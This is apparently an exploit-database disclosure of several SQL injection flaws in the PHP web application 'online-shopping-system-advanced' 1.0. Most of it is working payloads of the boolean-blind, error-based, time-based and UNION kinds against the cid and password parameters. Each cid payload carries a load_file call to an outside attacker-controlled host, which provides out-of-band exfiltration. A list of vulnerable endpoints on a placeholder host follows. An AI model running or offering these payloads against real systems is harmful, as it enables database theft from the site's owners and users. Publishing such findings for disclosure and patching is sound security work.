The online-shopping-system-advanced-1.0 suffers from multiple SQLi
The attacker can steal all information from the database of this system.
Status: CRITICAL
[+] Exploit:
```MYSQL
Parameter: cid (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: getProduct=1&setPage=1&pageNumber=1&cid=2'+(select
load_file('\\\\oum6bh09wi5ca5njey591t5q7hda11upls9kwdk2.tupmangal.net\\miu'))+''
OR NOT 4084=4084 AND 'icSi'='icSi
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause (FLOOR)
Payload: getProduct=1&setPage=1&pageNumber=1&cid=2'+(select
load_file('\\\\oum6bh09wi5ca5njey591t5q7hda11upls9kwdk2.tupmangal.net\\miu'))+''
AND (SELECT 3031 FROM(SELECT COUNT(*),CONCAT(0x716a707a71,(SELECT
(ELT(3031=3031,1))),0x716a717871,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'gwMy'='gwMy
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: getProduct=1&setPage=1&pageNumber=1&cid=2'+(select
load_file('\\\\oum6bh09wi5ca5njey591t5q7hda11upls9kwdk2.tupmangal.net\\miu'))+''
AND (SELECT 4189 FROM (SELECT(SLEEP(17)))bNrO) AND 'UbMN'='UbMN
Type: UNION query
Title: MySQL UNION query (NULL) - 4 columns
Payload: getProduct=1&setPage=1&pageNumber=1&cid=2'+(select
load_file('\\\\oum6bh09wi5ca5njey591t5q7hda11upls9kwdk2.tupmangal.net\\miu'))+''
UNION ALL SELECT
NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a707a71,0x7a4e4f74416a58717749646143726a6e68714368626556676e756d7076764867677176516b58684f,0x716a717871),NULL,NULL,NULL#
```
--------------------------------------------------------------------------------------------
```MYSQL
Parameter: password (POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause (FLOOR)
Payload: email=wGpFwAQH@tupmangal.net&password=e2H!l7r!I2' AND (SELECT
7287 FROM(SELECT COUNT(*),CONCAT(0x71766a6b71,(SELECT
(ELT(7287=7287,1))),0x7171716b71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)# oUWI&remember-me=on
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: email=wGpFwAQH@tupmangal.net&password=e2H!l7r!I2' AND (SELECT
7259 FROM (SELECT(SLEEP(17)))yXIE)# kWgA&remember-me=on
````
--------------------------------------------------------------------------------------------
```MYSQL
```
## And more:
```txt
[1.1. http://pwnedhost.com/online-shopping-system-advanced/action.php [cid
parameter]]
[1.2. http://pwnedhost.com/online-shopping-system-advanced/action.php [cid
parameter]]
[1.3. http://pwnedhost.com/online-shopping-system-advanced/login.php
[password parameter]]
[1.4. http://pwnedhost.com/online-shopping-system-advanced/product.php [p
parameter]]
[1.5. http://pwnedhost.com/online-shopping-system-advanced/product.php [p
parameter]]
[1.6. http://pwnedhost.com/online-shopping-system-advanced/review.php
[email parameter]]
[1.7. http://pwnedhost.com/online-shopping-system-advanced/review.php [name
parameter]]
```
PoC:
https://github.com/PuneethReddyHC/online-shopping-system-advanced/issues/51
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>